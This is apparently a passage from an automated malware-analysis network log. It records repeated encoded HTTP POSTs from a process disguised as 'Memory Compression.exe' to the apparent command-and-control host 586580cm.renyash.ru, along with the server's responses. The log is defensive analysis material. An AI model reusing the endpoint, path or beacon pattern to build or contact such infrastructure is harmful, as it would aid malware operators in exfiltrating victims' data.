                                                                                                                                Jan 11, 2025 15:03:19.158085108 CET1060OUTData Raw: 5f 57 58 5a 5f 5f 58 5c 5c 5f 50 57 54 5d 59 59 59 5c 5b 58 57 55 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _WXZ__X\\_PWT]YYY\[XWUTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& +$_#2"'%8\)&=<Q :6R0.V?&Z"/R);.^''P*
                                                                                                                                Jan 11, 2025 15:03:19.249494076 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:19.497073889 CET790INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGJrDkIqqzMJkjUOjE4d9mK0TdWiPgIEFFGx6pw8ZNKvRn4JgdcZ21pyY5FXtG2qoAesL8kUcvnZUCi9rZ9IipMAetjr8Aku2cAXTYfSo4IFUBIqgL0bPsPE2qGoHERAbmseD923"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005731509be4310-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1756&rtt_var=775&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=656770&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:19.583830118 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                57192.168.2.550039104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:19.711700916 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:20.064707994 CET1060OUTData Raw: 5a 55 58 5a 5f 52 5d 51 5c 5f 50 57 54 5d 59 59 59 54 5b 58 57 53 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZUXZ_R]Q\_PWT]YYYT[XWSTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y20^<^4!%0+)==;8#*%%,"V??^"+=+.^''P*
                                                                                                                                Jan 11, 2025 15:03:20.169523001 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:20.429332018 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9v39w18g%2FvfoYH6edVsYaQJYYxbowqnS2NcrmU3PFcbm3wpeqw1V%2FgsXAqD1uUCiYqr0vg12RoN7FG%2Bd%2Bs0TH%2Bs%2FjX48u%2FOnep7GzjvpFRM53tST%2FTPizgkV63VqYYduT4M3bpiH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005731abdcd439c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3831&min_rtt=2468&rtt_var=3653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=109134&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:20.520004988 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                58192.168.2.550040104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:20.648499966 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                59192.168.2.550041104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:20.915662050 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:21.267472982 CET1776OUTData Raw: 5f 5f 58 5f 5f 5a 5d 54 5c 5f 50 57 54 52 59 52 59 55 5b 5f 57 56 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __X__Z]T\_PWTRYRYU[_WVT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&<\+4^#='&+?:%=37$<2T?&?5$$).^''P*
                                                                                                                                Jan 11, 2025 15:03:21.378658056 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:21.565748930 CET954INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pNQD%2F4VsaROwmsdJVLYxE%2By7clcpWn%2FYwryo%2BAoG1GJYgguyiQjIXW58D4eXFF7vF94zR3AFIwLTCD3RAkKh4Tc1nQnOWAqjhjt%2F8Cta5CI71gDuCs04T0WYbhESKjiTB2YUdCr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573225de14251-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1724&rtt_var=4061&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=94897&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 16 21 2d 3d 08 21 3b 0b 0b 29 32 38 02 33 33 2e 04 2b 31 2d 00 26 05 2c 59 2d 28 30 56 23 39 2c 5d 25 2d 3d 1b 25 3e 3e 13 28 3b 2c 5d 00 10 23 06 24 23 2a 02 2d 0b 36 0d 3e 1f 0e 08 20 12 09 5b 30 38 0f 0f 23 23 2c 05 23 13 3a 03 38 57 3f 57 39 24 22 5b 2e 06 30 11 37 35 2b 55 00 14 23 0b 31 39 1a 58 2a 20 20 13 20 16 2d 00 24 38 28 54 3e 02 38 11 29 38 3d 53 29 3f 35 0a 37 01 29 1d 29 0a 2f 18 27 54 3e 0a 25 16 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'!-=!;)2833.+1-&,Y-(0V#9,]%-=%>>(;,]#$#*-6> [08##,#:8W?W9$"[.075+U#19X* -$8(T>8)8=S)?57))/'T>%!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                60192.168.2.550042104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:21.044621944 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:21.392429113 CET1060OUTData Raw: 5f 52 5d 59 5a 5f 58 55 5c 5f 50 57 54 56 59 59 59 54 5b 50 57 57 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _R]YZ_XU\_PWTVYYYT[PWWT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& X+277%'4^=9+;4%3Y&T('X!/V)+.^''P*)
                                                                                                                                Jan 11, 2025 15:03:21.498255014 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:21.734172106 CET813INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGS1V9yykT0JHjCvSURmypFa6I%2B%2Ft%2FcXxxFuCPR%2Bgl7jIzbpJWcN2tzkw6SqxGgegLXhi%2FgIsrZNrzR1yXRTbNKZn7dzms%2B7r6MLV%2FyAojpXiPc5ADRbsoNFmbf%2FBOn%2FprZ63maq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573231eca8cad-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4099&min_rtt=1935&rtt_var=5054&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=75840&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                61192.168.2.550043104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:21.911654949 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:22.267559052 CET1056OUTData Raw: 5f 5f 58 5e 5a 59 5d 50 5c 5f 50 57 54 55 59 53 59 56 5b 5c 57 54 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __X^ZY]P\_PWTUYSYV[\WTTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&/+"]#*]&&(]=5*7:'<=+@;Y577R>;.^''P*
                                                                                                                                Jan 11, 2025 15:03:22.365668058 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:22.540662050 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UdJVuZdfYRN3XmiO3swK7pPSLUxx5iDDSBClrbykaLhO%2Bf8BT08PCy1UEus84G1qUhnP4PmpcOqaV12h5%2Fu%2Fm0iwZsTyPIkIrpai5KdkfbkHhTc52ly%2BKQ6iPuYLgPwkN9uT1Pa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573288989447a-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4852&min_rtt=1748&rtt_var=6865&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1342&delivery_rate=54914&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                62192.168.2.550044104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:22.683751106 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:23.034512997 CET1060OUTData Raw: 5f 52 58 5d 5a 59 5d 53 5c 5f 50 57 54 52 59 58 59 57 5b 5b 57 57 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _RX]ZY]S\_PWTRYXYW[[WWTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&#(<"4-35Y>9\);$P :5%<=+6Q'T>.^''P*
                                                                                                                                Jan 11, 2025 15:03:23.143856049 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:23.399225950 CET813INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFEMj%2FR0kr7R%2FwqoyaZKjH%2BBSlyWsykurQFOm4HVUbJl9lrhirh4OE0zmwt3Lf8Sr%2FF%2FtXwuzKjki%2B%2Bb%2FbqemMzyOexBtyIePLqE3POGaF8HEgXamN4OJlRehq%2B7xnN9REImSJCt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005732d5aa58ce6-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3724&min_rtt=2021&rtt_var=4164&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=93320&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                63192.168.2.550045104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:23.532582998 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:23.876832008 CET1060OUTData Raw: 5f 52 5d 58 5f 59 5d 51 5c 5f 50 57 54 56 59 5e 59 51 5b 59 57 5e 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _R]X_Y]Q\_PWTVY^YQ[YW^T][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&(\?1(]790C,Y*%\>(,T#5$"W+5'Z548*.^''P*)
                                                                                                                                Jan 11, 2025 15:03:24.081295013 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:24.327565908 CET793INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7UzD4zWAkAxVofTs7vKW6xmHTPs3vs1pRWd7MA9qTzvslHXA71pV587edcRprhPbZ0xo9XLvlUNZ9Sjy5nU9lS0Te78K2b3t0akYiMJnIWIZcHO1LP%2Fhfc6TCzWnV4cbTKNsKg3p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573333f6d0f6b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2882&min_rtt=1499&rtt_var=3330&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=116149&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:24.415404081 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                64192.168.2.550046104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:24.541996956 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:24.892451048 CET1060OUTData Raw: 5a 53 5d 5b 5a 5f 58 55 5c 5f 50 57 54 52 59 5f 59 52 5b 51 57 52 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS][Z_XU\_PWTRY_YR[QWRTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_&3<2,\42&[$&4>:)_=<#)9'?.*6;^!V).^''P*
                                                                                                                                Jan 11, 2025 15:03:25.001996994 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:25.240884066 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAA%2BYQdYukv58Tw%2FHbsj9tnssxaBTUANcC4XTFNxoJfee29optpi8pZDtftdrgzn%2F%2Buz2Eerhb2c7yNPzQx1fA2D3KHObNkrrCWfLQbqhLTmi5TPhnhKzpd0zcZqHO68Kw%2BcJ280"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057338fdb4330c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3888&min_rtt=2044&rtt_var=4455&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=86915&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                65192.168.2.550047104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:25.368118048 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:25.722239971 CET1060OUTData Raw: 5a 52 5d 5a 5f 58 5d 53 5c 5f 50 57 54 56 59 5a 59 54 5b 50 57 53 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]Z_X]S\_PWTVYZYT[PWST_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\2]<!<#&&0*)*>(? _=%?(;^!?R).^''P*)
                                                                                                                                Jan 11, 2025 15:03:25.832523108 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:25.996213913 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SWIZAKgPmc3Vp4bqdOVR4hs2bIosid%2BdNSfW2yd63wI4Ktw3Qsv%2BiQ8yYYpAfSulhy%2BnLCdTYMMaRa%2FKbiTI5HPn4QC3cd9SeTAYGpdJFq7HJF10cmQELA2WqH4opstIqrqtgXwb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005733e2da6f799-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
